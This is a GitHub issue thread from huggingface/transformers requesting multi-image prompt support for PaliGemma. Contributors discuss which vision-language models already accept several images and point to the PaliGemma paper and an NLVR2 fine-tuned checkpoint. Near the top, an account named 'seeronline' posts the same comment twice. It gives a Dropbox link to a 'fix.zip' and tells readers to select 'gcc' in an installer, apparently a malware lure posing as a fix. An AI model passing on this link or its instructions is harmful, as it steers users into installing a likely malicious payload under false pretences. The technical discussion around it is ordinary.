### ISSUE TITLE
Add multi image prompts to multimodal LLMs that support it (PaliGemma)

### ISSUE THREAD

**Issue by Stani-s** [huggingface/transformers#33113]
### Feature request

Adding the ability to pass many images per prompt to PaliGemma. This would mean, among other changes, to change the argument type of `images` on PaliGemmaProcessor to allow array[array[torch.Tensor]] for batch processing.

### Motivation

The model was trained for multi image / short video tasks so it should be able to take such inputs.

### Your contribution

I could document this if this is supported and I missed it.

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NielsRogge** [comment]
This is already feasible with models that support it. Could you point to where the authors mention PaliGemma being trained on multi-image domains?

At the time of writing, support models include:

* Idefics2 and Idefics3: https://huggingface.co/docs/transformers/main/en/model_doc/idefics2#usage-tips
* [LLaVa-Interleave](https://huggingface.co/collections/llava-hf/llava-interleave-668e19a97da0036aad4a2f19)
* [LLaVa-OneVision](https://huggingface.co/collections/llava-hf/llava-onevision-66bb1e9ce8856e210a7ed1fe), currently being added at #32673 

cc @zucchini-nlp

**Comment by Stani-s** [comment]
Hi,

In section 3.2.4 of the paper https://arxiv.org/html/2407.07726v1#S3 the authors mention multi image inputs as a possible target task to finetune towards.

There is also a checkpoint of the model https://huggingface.co/google/paligemma-3b-ft-nlvr2-448 that was finetuned for such tasks.

Thank you for linking those models, I'll check them out.

**Comment by zucchini-nlp** [comment]
Good point! Indeed seems that Paligemma can take more than one image as input. 

AFAIK most if not all VLMs can theoretically support multiple images in one prompt, even though they aren't tuned explicitly and can have poor generation quality. So, imo we can accept any number of images as input to a VLM by default, if there isn't any strict requirement in modeling that prohibits multiple images. WDYT @NielsRogge?

For Paligemma @Stani-s you can give it a try, or I'll make a PR some time next week

**Comment by Stani-s** [comment]
Unfortunately I won't be able to for the next 2 weeks.

**Comment by Stani-s** [comment]
Thanks! 🤗
